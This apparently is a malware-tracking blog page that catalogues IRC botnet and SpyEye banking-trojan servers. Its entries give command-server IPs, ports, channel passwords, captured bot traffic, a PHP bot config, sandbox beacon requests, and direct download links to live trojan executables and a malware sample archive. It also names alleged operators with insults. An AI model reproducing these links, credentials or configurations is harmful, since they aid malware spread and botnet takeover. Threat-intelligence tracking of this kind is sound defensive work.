Resolved : [www.chatcity2011.net] To [176.53.19.44] Resolved : [www.chatcity2011.net] To [176.53.19.45] Remote Host Port Number 176.53.19.44 81 irc here 213.131.252.251 80 74.206.242.164 80 NICK [N00_USA_XP_2228330] PRIVMSG [N00_USA_XP_2228 @ :scan; Trying to get external IP. USER SP2-988 * 0 :COMPUTERNAME @ :scan; Sequential Port Scan started on 174.133.89.0:445 with a delay of 5 seconds for 0 minutesRead more...
212.58.8.78(irc botnet hosted in Turkey Istanbul Doruk Iletisim Ve Otomasyon Sanayi Ve Ticaret A.s)
Remote Host Port Number 212.58.8.78 4244 NICK new[iRooT-XP-USA]296933 USER 3378 “” “TsGh” :3378 PONG :6DFC6C82 JOIN #!bt!# sk1 hosting infos: http://whois.domaintools.com/212.58.8.78
85.17.180.218(irc botnet hosted in Netherlands Amsterdam Leaseweb B.v)
Remote Host Port Number 85.17.180.218 7775 NICK {XPUSA338226} PONG irc.foonet.com USER COMPUTERNAME * 0 :COMPUTERNAME MODE {XPUSA338226} -ix JOIN #karakirli MODE #karakirli -ix UPDATE: NICK n{Ganja-USA|XP}011539 PRIVMSG #c :http://www.r0kettube.com/kategori/Fantazi-Porno Has Been Visited! USER 0115 “” “TsGh” :0115 JOIN #o3 PRIVMSG #d :http://www.r0kettube.com/kategori/Hemsire-Porno Has Been Visited! JOIN #a,#b,#c,#d,#e,#f,#g,#h,# ,#j,#k,#l (null) PRIVMSG #e :http://r0kettube.com/eski-porno-filmi.html Has Been Visited!Read more...
74.117.56.213(irc botnet hosted in United States Union City Psychz Networks)
Remote Host Port Number 74.117.56.213 2319 PASS charm@nte! NICK [NEW][USA]COMPUTERNAME|49470 USER [NEW][USA]COMPUTERNAME|49470 [NEW][USA]COMPUTERNAME|49470 [NEW][USA]COMPUTERNAME|49470 [NEW][USA]COMPUTERNAME|49470 JOIN ##WAREZ## charm@nte~!~ PONG :ur.now.afraid.org hosting infos: http://whois.domaintools.com/74.117.56.213
116.126.143.141(ngrBot hosted in Korea, Republic Of Seoul Hanaro Telecom)
Remote Host Port Number 116.126.143.141 3922 PASS 441 213.251.170.52 80 50.22.66.188 80 NICK n{US|XPa}kttdoir USER kttdoir 0 0 :kttdoir JOIN #alfa … PRIVMSG #alfa :[DNS]: Blocked 1259 domain(s) – Redirected 0 domain(s) hosting infos: http://whois.domaintools.com/116.126.143.141
211.60.155.2(linux bots hosted in Korea, Republic Of Ulsan Dacom Corp)
var $config = array(“server”=>”211.60.155.2”, “port”=>”9999”, “pass”=>””, “prefix”=>”syik”, “maxrand”=>”4”, “chan”=>”#setoran”, “chan2″=>”#setoran”, “key”=>”setoran”, “modes”=>”+p”, “password”=>”setoran”, “trigger”=>”.”, “hostauth”=>”racrew” hosting infos: http://whois.domaintools.com/211.60.155.2
21mb malware samples
Alot of spyeye variants and other banking trojans,irc bots,worms etc Download: http://adf.ly/1xAh4
theimageshare.com (bfbot creator reborn?iserdo using spyeye hosted in Netherlands Amsterdam Snel Internet Services B.v)
Spy Eye Panel: http://theimageshare.com/kurac/ Spy Eye Sample: http://89.207.135.198/pas.exe http://adf.ly/1x8Rp just in case first link is removed Websites used to infect people: butterflysolutions.net ??? iserdo need money ? imageshare.cc iserdo.net ???? lol popusi.biz HTTP QueriesHTTP Query Text – 5xf9~x15x10x11x11x11x11x16x15x15x15x15x17x17x17x17x1ax1ax1ax1anx01!U4V:__-H8ty{{juuuux17xx0cS4A(LLx19jx0f}x0fN theimageshare.com GET /kurac/gate.php?guid=User!SANDBOXB!38BA2BE7&ver=10299&stat=ONLINE&ie=6.0.2900.2180&os=5.1.2600&ut=Admin&cpu=100&ccrc=FADB319B&md5=e47f5cbd0ae6d17cbeb5530db3f9779f HTTP/1.1 Windows Api CallsPId Image Name Address Function ( Parameters ) | Return ValueRead more...
privathosting.be/~ishigo/(Spy Eye Banking Trojan hosted in Viet Nam Layer 2 -customer Nework Of Vtdc)
ishigo is a poor french lamer he’s known in carding boards Exe File: http://privathosting.be/~ishigo/ptcmd.exe Avira fail detecting this: Nom du fichier Résultat ptcmd.exe FALSE POSITIVE Le fichier ‘ptcmd.exe’ a été classifié comme ‘FALSE POSITIVE’. Cela signifie que ce fichier n’est pas dangereux et qu’il s’agit d’un message erroné de notre part. Le modèle de détectionRead more...
HTTP malware
DNS QueriesDNS Query Text www.agriturismoraggiodisole.com IN A + www.agit.com.br IN A + www.ameagaru.fr IN A + HTTP QueriesHTTP Query Text www.agriturismoraggiodisole.com POST /files/filtect.php HTTP/1.0 www.agit.com.br POST /apuracao/filtect.php HTTP/1.0 www.ameagaru.fr POST /memo/filtect.php HTTP/1.0 DNS QueriesDNS Query Text www.allahskanan.net IN A + www.groupe-cogit.com IN A + fercon.ro IN A + demo.ckentgroup.com IN A + HTTP QueriesHTTP QueryRead more...